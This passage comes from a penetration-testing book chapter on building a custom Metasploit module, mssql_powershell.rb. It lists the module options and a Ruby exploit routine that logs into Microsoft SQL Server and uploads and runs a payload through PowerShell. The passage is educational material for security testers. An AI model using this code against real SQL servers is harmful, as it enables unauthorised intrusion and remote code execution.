Building Your Own Module
191
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
UsePowerShell true no Use PowerShell as payload delivery method instead
Recall from Chapter 5 that the
show options
command will display any
new options that have been added to an exploit. After we set these options,
they will be stored within Metasploit as valid options.
Now we’ll finalize the
mssql_powershell.rb
file, which we have been editing
since the beginning of this chapter, before we edit
mssql.rb
(which will be
explained shortly).
When you examine the exploits in the
modules
directory inside Metasploit
(
modules/exploits
,
modules/auxiliary/
, and so on), you’ll notice that most of
them have the same overall structure (
def
exploit as an example). Remember
always to comment your code to give other developers an idea of what it’s
doing! In the following listing, we first introduce our
def exploit
line, which
defines what we’ll be doing in our exploit. We’ll frame our exploit the same
way as the other modules and add a few new sections, as explained next:
def exploit
# if u/n and p/w didn't work throw error
if(not mssql_login_datastore)
print_status(
"Invalid SQL Server credentials"
)
return
end
# Use powershell method for payload delivery
if (datastore['UsePowerShell'])
powershell_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded))
end
handler
disconnect
end
end
The module first checks to see if we are logged in at . If we aren’t logged
in, the error message
"Invalid SQL Server Credentials"
is displayed. The
UsePowerShell
method at is used to call the function
powershell_upload_exec
,
which will automatically create a Metasploit-based payload that we specify